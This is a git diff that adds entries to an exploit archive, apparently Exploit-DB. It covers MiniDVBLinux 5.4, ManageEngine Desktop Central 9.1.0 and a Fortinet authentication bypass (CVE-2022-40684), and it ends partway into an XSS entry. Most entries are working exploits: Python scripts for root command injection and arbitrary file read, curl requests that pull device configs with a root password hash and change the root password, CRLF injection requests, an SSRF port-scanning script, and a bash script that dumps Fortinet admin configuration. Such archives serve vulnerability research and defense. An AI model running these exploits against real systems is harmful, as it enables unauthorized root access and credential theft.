diff --git a/exploits/hardware/remote/51091.txt b/exploits/hardware/remote/51091.txt new file mode 100644 index 000000000..16d6f07bd --- /dev/null +++ b/exploits/hardware/remote/51091.txt @@ -0,0 +1,73 @@ +# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit +# Exploit Author: LiquidWorm + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application is vulnerable to unauthenticated configuration +download when direct object reference is made to the backup function +using an HTTP GET request. This will enable the attacker to disclose +sensitive information and help her in authentication bypass, privilege +escalation and full system access. + +==================================================================== +/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh: +------------------------------------------------------------ +01: /dev/null +07: cat /tmp/backup_config_$$.tgz +08: rm -rf /tmp/backup_config* +09: exit +10: fi +11: ?> +12:
+ +==================================================================== + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5713 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php + + +24.09.2022 + +-- + + +> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz +> mkdir configdir +> tar -xvzf config.tgz -C .\configdir +> cd configdir && cd etc +> type passwd +root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh +daemon:!:1:1::/: +ftp:!:40:2:FTP account:/:/bin/sh +user:!:500:500::/home/user:/bin/sh +nobody:!:65534:65534::/tmp: +_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin +> \ No newline at end of file diff --git a/exploits/hardware/remote/51093.txt b/exploits/hardware/remote/51093.txt new file mode 100644 index 000000000..0600039b6 --- /dev/null +++ b/exploits/hardware/remote/51093.txt @@ -0,0 +1,53 @@ +# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) +# Exploit Author: LiquidWorm + +MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application allows the usage of the SVDRP protocol/commands +to be sent by a remote attacker to manipulate and/or control remotely +the TV. + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5714 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php + + +24.09.2022 + +-- + + +Send a message to the TV screen: + +curl http://ip:8008/?site=commands§ion=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU! + +220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8 +250 Message queued +221 mld closing connection + +For more commands: + - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands \ No newline at end of file diff --git a/exploits/hardware/remote/51094.txt b/exploits/hardware/remote/51094.txt new file mode 100644 index 000000000..21386a74a --- /dev/null +++ b/exploits/hardware/remote/51094.txt @@ -0,0 +1,156 @@ +# Exploit Title: MiniDVBLinux 5.4 - Change Root Password +# Exploit Author: LiquidWorm +MiniDVBLinux 5.4 Change Root Password PoC + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application allows a remote attacker to change the root +password of the system without authentication (disabled by default) +and verification of previously assigned credential. Command execution +also possible using several POST parameters. + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5715 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php + + +24.09.2022 + +-- + + +Default root password: mld500 + +Change system password: +----------------------- + +POST /?site=setup§ion=System HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 +Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 778 +Content-Type: application/x-www-form-urlencoded +Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba +Host: ip:8008 +Origin: http://ip:8008 +Referer: http://ip:8008/?site=setup§ion=System +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 +sec-gpc: 1 + +APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save¶ms=&changed=SYSTEM_PASSWORD+ + + +Pretty post data: + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: r00t +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Kumanovo +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +action: save +params: +changed: SYSTEM_PASSWORD + + +Eenable webif password check: +----------------------------- + +POST /?site=setup§ion=System HTTP/1.1 + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Berlin +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +WEBIF_PASSWORD_CHECK: 1 +action: save +params: +changed: WEBIF_PASSWORD_CHECK + + +Disable webif password check: +----------------------------- + +POST /?site=setup§ion=System HTTP/1.1 + +APT_UPGRADE_CHECK: 1 +APT_SYSTEM_ID: 1 +APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass +APT_PACKAGE_CLASS: stable +SYSTEM_NAME: MiniDVBLinux +SYSTEM_VERSION_command: /etc/setup/base.sh setversion +SYSTEM_VERSION: 5.4 +SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword +SYSTEM_PASSWORD: +BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi +BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd +BUSYBOX_NTPD: 1 +LOG_LEVEL: 1 +SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog +SYSLOG_SIZE: +LANG_command: /etc/setup/locales.sh setlang +LANG: en_GB.UTF-8 +TIMEZONE_command: /etc/setup/locales.sh settimezone +TIMEZONE: Europe/Berlin +KEYMAP_command: /etc/setup/locales.sh setkeymap +KEYMAP: de-latin1 +action: save +params: +changed: WEBIF_PASSWORD_CHECK \ No newline at end of file diff --git a/exploits/hardware/remote/51095.txt b/exploits/hardware/remote/51095.txt new file mode 100644 index 000000000..aa4a4ee9b --- /dev/null +++ b/exploits/hardware/remote/51095.txt @@ -0,0 +1,66 @@ +# Exploit Title: MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure +# Exploit Author: LiquidWorm +MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability + + +Vendor: MiniDVBLinux +Product web page: https://www.minidvblinux.de +Affected version: <=5.4 + +Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +way to convert a standard PC into a Multi Media Centre based on the +Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +Linux based Digital Video Recorder: Watch TV, Timer controlled +recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +via browser, and a lot more. MLD strives to be as small as possible, +modular, simple. It supports numerous hardware platforms, like classic +desktops in 32/64bit and also various low power ARM systems. + +Desc: The application suffers from an unauthenticated live stream +disclosure when /tpl/tv_action.sh is called and generates a snapshot +in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). + +-------------------------------------------------------------------- +/var/www/tpl/tv_action.sh: +-------------------------- +01: #!/bin/sh +02: +03: header +04: +05: quality=60 +06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")" +07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null +-------------------------------------------------------------------- + +Tested on: MiniDVBLinux 5.4 + BusyBox v1.25.1 + Architecture: armhf, armhf-rpi2 + GNU/Linux 4.19.127.203 (armv7l) + VideoDiskRecorder 2.4.6 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5716 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php + + +24.09.2022 + +-- + + +1. Generate screengrab: + - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" + - Response: +220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 +250 Grabbed image /tmp/tv.jpg 60 +221 mld closing connection + +2. View screengrab: + - Request: curl http://ip:8008/images/tv.jpg + +3. Or use a browser: + - http://ip:8008/home?site=remotecontrol \ No newline at end of file diff --git a/exploits/hardware/remote/51096.py b/exploits/hardware/remote/51096.py new file mode 100755 index 000000000..e59fe6279 --- /dev/null +++ b/exploits/hardware/remote/51096.py @@ -0,0 +1,67 @@ +# Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection +# Exploit Author: LiquidWorm +#!/usr/bin/env python3 +# +# +# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability +# +# +# Vendor: MiniDVBLinux +# Product web page: https://www.minidvblinux.de +# Affected version: <=5.4 +# +# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +# way to convert a standard PC into a Multi Media Centre based on the +# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +# Linux based Digital Video Recorder: Watch TV, Timer controlled +# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +# via browser, and a lot more. MLD strives to be as small as possible, +# modular, simple. It supports numerous hardware platforms, like classic +# desktops in 32/64bit and also various low power ARM systems. +# +# Desc: The application suffers from an OS command injection vulnerability. +# This can be exploited to execute arbitrary commands with root privileges. +# +# Tested on: MiniDVBLinux 5.4 +# BusyBox v1.25.1 +# Architecture: armhf, armhf-rpi2 +# GNU/Linux 4.19.127.203 (armv7l) +# VideoDiskRecorder 2.4.6 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2022-5717 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php +# +# +# 24.09.2022 +# + +import requests +import re,sys + +#test case 001 +#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT +#test case 004 +#http://ip:8008/?site=about&name=blind&file=$(id) +#cat: can't open 'uid=0(root)': No such file or directory +#cat: can't open 'gid=0(root)': No such file or directory +#test case 005 +#http://ip:8008/?site=about&name=blind&file=`id` +#cat: can't open 'uid=0(root)': No such file or directory +#cat: can't open 'gid=0(root)': No such file or directory + +if len(sys.argv) < 3: + print('MiniDVBLinux 5.4 Command Injection PoC') + print('Usage: ./mldhd_root2.py [url] [cmd]') + sys.exit(17) +else: + url = sys.argv[1] + cmd = sys.argv[2] + +req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') +outz = re.search('
(.*?)
',req.text,flags=re.S).group() +print(outz.replace('
','').replace('
','')) \ No newline at end of file diff --git a/exploits/hardware/remote/51097.py b/exploits/hardware/remote/51097.py new file mode 100755 index 000000000..50903906c --- /dev/null +++ b/exploits/hardware/remote/51097.py @@ -0,0 +1,61 @@ +# Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read +# Exploit Author: LiquidWorm +#!/usr/bin/env python3 +# +# +# MiniDVBLinux 5.4 Arbitrary File Read Vulnerability +# +# +# Vendor: MiniDVBLinux +# Product web page: https://www.minidvblinux.de +# Affected version: <=5.4 +# +# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple +# way to convert a standard PC into a Multi Media Centre based on the +# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this +# Linux based Digital Video Recorder: Watch TV, Timer controlled +# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration +# via browser, and a lot more. MLD strives to be as small as possible, +# modular, simple. It supports numerous hardware platforms, like classic +# desktops in 32/64bit and also various low power ARM systems. +# +# Desc: The distribution suffers from an arbitrary file disclosure +# vulnerability. Using the 'file' GET parameter attackers can disclose +# arbitrary files on the affected device and disclose sensitive and system +# information. +# +# Tested on: MiniDVBLinux 5.4 +# BusyBox v1.25.1 +# Architecture: armhf, armhf-rpi2 +# GNU/Linux 4.19.127.203 (armv7l) +# VideoDiskRecorder 2.4.6 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2022-5719 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php +# +# +# 24.09.2022 +# + +import requests +import re,sys + +#test case 001 +#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT + +if len(sys.argv) < 3: + print('MiniDVBLinux 5.4 File Disclosure PoC') + print('Usage: ./mldhd_fd.py [url] [file]') + sys.exit(17) +else: + url = sys.argv[1] + fil = sys.argv[2] + +req = requests.get(url+'/?site=about&name=ZSL&file='+fil) +outz = re.search('
(.*?)
',req.text,flags=re.S).group() +print(outz.replace('
','').replace('
','')) \ No newline at end of file diff --git a/exploits/jsp/webapps/51082.txt b/exploits/jsp/webapps/51082.txt new file mode 100644 index 000000000..d3707ada3 --- /dev/null +++ b/exploits/jsp/webapps/51082.txt @@ -0,0 +1,234 @@ +# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities +# Discovery by: Rafael Pedrero +# Discovery Date: 2021-02-14 +# Software Link : http://www.desktopcentral.com +# Tested Version: 9.1.0 (Build No: 91084) +# Tested on: Windows 10 + +# Vulnerability Type: CRLF injection (CRLF) - 1 + +CVSS v3: 6.1 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-93 + +Vulnerability description: CRLF injection vulnerability in ManageEngine +Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP +headers and conduct HTTP response splitting attacks via the fileName +parameter in a /STATE_ID/1613157927228/InvSWMetering.csv. + +Proof of concept: + +GET +https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true +HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 +Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +DNT: 1 +Connection: keep-alive +Referer: +https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering +Upgrade-Insecure-Requests: 1 +Content-Length: 0 +Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; +STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; +showRefMsg=false; summarypage=false; +DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; +JSESSIONID=0B20DEF653941DAF5748931B67972CDB; +JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 +Host: localhost + +Response: +HTTP/1.1 200 OK +Date: +Server: Apache +Pragma: public +Cache-Control: max-age=0 +Expires: Wed, 31 Dec 1969 16:00:00 PST +SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; +Secure +Set-Cookie: buildNum=91084; Path=/ +Set-Cookie: showRefMsg=false; Path=/ +Set-Cookie: summarypage=false; Path=/ +Set-Cookie: dc_customerid=1; Path=/ +Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ +Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ +Set-Cookie: screenResolution=1280x1024; Path=/ +Content-Disposition: attachment; filename=any +Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv +X-dc-header: yes +Content-Length: 95 +Keep-Alive: timeout=5, max=20 +Connection: Keep-Alive +Content-Type: text/csv;charset=UTF-8 + + +# Vulnerability Type: CRLF injection (CRLF) - 2 + +CVSS v3: 6.1 +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N +CWE: CWE-93 + +Vulnerability description: CRLF injection vulnerability in ManageEngine +Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP +headers and conduct HTTP response splitting attacks via the fileName +parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf. + +Proof of concept: + +GET +https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true +HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 +Firefox/85.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +DNT: 1 +Connection: keep-alive +Referer: +https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering +Upgrade-Insecure-Requests: 1 +Content-Length: 0 +Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084; +STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228; +showRefMsg=false; summarypage=false; +DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1; +JSESSIONID=0B20DEF653941DAF5748931B67972CDB; +JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024 +Host: localhost + + +HTTP/1.1 200 OK +Date: +Server: Apache +Pragma: public +Cache-Control: max-age=0 +Expires: Wed, 31 Dec 1969 16:00:00 PST +SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly; +Secure +Set-Cookie: buildNum=91084; Path=/ +Set-Cookie: showRefMsg=false; Path=/ +Set-Cookie: summarypage=false; Path=/ +Set-Cookie: dc_customerid=1; Path=/ +Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/ +Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/ +Set-Cookie: screenResolution=1280x1024; Path=/ +Content-Disposition: attachment; filename=any +Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013 +X-dc-header: yes +Content-Length: 4470 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/pdf;charset=UTF-8 + + + +# Vulnerability Type: Server-Side Request Forgery (SSRF) + +CVSS v3: 8.0 +CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H +CWE: CWE-918 Server-Side Request Forgery (SSRF) + +Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability +in ManageEngine Desktop Central 9.1.0 allows an attacker can force a +vulnerable server to trigger malicious requests to third-party servers or +to internal resources. This vulnerability allows authenticated attacker +with network access via HTTP and can then be leveraged to launch specific +attacks such as a cross-site port attack, service enumeration, and various +other attacks. + +Proof of concept: + +Save this content in a python file (ex. ssrf_manageenginedesktop9.py), +change the variable sitevuln value with ip address: + +import argparse +from termcolor import colored +import requests +import urllib3 +import datetime +urllib3.disable_warnings() + +print(colored(''' +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ +''',"red")) + +def smtpConfig_ssrf(target,port,d): + now1 = datetime.datetime.now() + text = '' + sitevuln = 'localhost' + url = 'https:// +'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin% +40manageengine.com +&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin% +40manageengine.com' + cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73; +buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false; +JSESSIONID=D10A9C62D985A0966647099E14C622F8; +DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0' + try: + response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 +(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept': +'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': +'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': ' +https://192.168.56.250:8383/smtpConfig.do','Cookie': + cookie,'Connection': 'keep-alive'},verify=False, timeout=10) + + text = response.text + now2 = datetime.datetime.now() + rest = (now2 - now1) + seconds = rest.total_seconds() + + if ('updateRefMsgCookie' in text): + return colored('Cookie lost',"yellow") + + if d == "0": + print ('Time response: ' + str(rest) + '\n' + text + '\n') + + if (seconds > 5.0): + return colored('open',"green") + else: + return colored('closed',"red") + + except: + now2 = datetime.datetime.now() + rest = (now2 - now1) + seconds = rest.total_seconds() + if (seconds > 10.0): + return colored('open',"green") + else: + return colored('closed',"red") + + return colored('unknown',"yellow") + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 - +SSRF Open ports",required=True) + parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9 +- SSRF Open ports",required=True) + parser.add_argument('-d','--debug', help="ManageEngine Desktop Central +9 - SSRF Open ports (0 print or 1 no print)",required=False) + args = parser.parse_args() + timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug) + print (args.ip + ':' + args.port + ' ' + timeresp + '\n') + + + +And: + +$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080 + +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ + +192.168.56.250:8080 open + +$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777 + +------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------ + +192.168.56.250:7777 closed \ No newline at end of file diff --git a/exploits/multiple/webapps/51092.sh b/exploits/multiple/webapps/51092.sh new file mode 100755 index 000000000..9cf071510 --- /dev/null +++ b/exploits/multiple/webapps/51092.sh @@ -0,0 +1,55 @@ +# Exploit Title: Fortinet Authentication Bypass v7.2.1 - (FortiOS, FortiProxy, FortiSwitchManager) +# Date: 13/10/2022 +# Exploit Author: Felipe Alcantara (Filiplain) +# Vendor Homepage: https://www.fortinet.com/ +# Version: +#FortiOS from 7.2.0 to 7.2.1 +#FortiOS from 7.0.0 to 7.0.6 +#FortiProxy 7.2.0 +#FortiProxy from 7.0.0 to 7.0.6 +#FortiSwitchManager 7.2.0 +#FortiSwitchManager 7.0.0 +# Tested on: Kali Linux +# CVE : CVE-2022-40684 + +# https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass + +# Usage: ./poc.sh +# Example: ./poc.sh 10.10.10.120 8443 + +#!/bin/bash + +red="\e[0;31m\033[1m" +blue="\e[0;34m\033[1m" +yellow="\e[0;33m\033[1m" +end="\033[0m\e[0m" + +target=$1 +port=$2 + +vuln () { + +echo -e "${yellow}[+] Dumping System Information: ${end}" + +timeout 10 curl -s -k -X $'GET' \ + -H $'Host: 127.0.0.1:9980' -H $'User-Agent: Node.js' -H $'Accept-Encoding\": gzip, deflate' -H $'Forwarded: by=\"[127.0.0.1]:80\";for=\"[127.0.0.1]:49490\";proto=http;host=' -H $'X-Forwarded-Vdom: root' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' "https://$target:$port/api/v2/cmdb/system/admin" > $target.out +if [ "$?" == "0" ];then + grep "results" ./$target.out >/dev/null + if [ "$?" == "0" ];then + echo -e "${blue}Vulnerable: Saved to file $PWD/$target.out ${end}" + else + rm -f ./$target.out + echo -e "${red}Not Vulnerable ${end}" + fi + +else + + echo -e "${red}Not Vulnerable ${end}" + rm -f ./$target.out + +fi + + +} + +vuln \ No newline at end of file diff --git a/exploits/php/webapps/51062.txt b/exploits/php/webapps/51062.txt new file mode 100644 index 000000000..40c9bd339 --- /dev/null +++ b/exploits/php/webapps/51062.txt @@ -0,0 +1,264 @@ +## Exploit Title: Canteen-Management v1.0 - XSS-Reflected +## Exploit Author: nu11secur1ty +## Date: 10.04.2022 +## Vendor: Free PHP Projects & Ideas with Source Codes for Students | +mayurik +## Software: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs +## Reference: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management + +## Description: +The name of an arbitrarily supplied URL parameter is copied into the value +of an HTML tag attribute which is encapsulated in double quotation marks. +The attacker can craft a very malicious HTTPS URL redirecting to 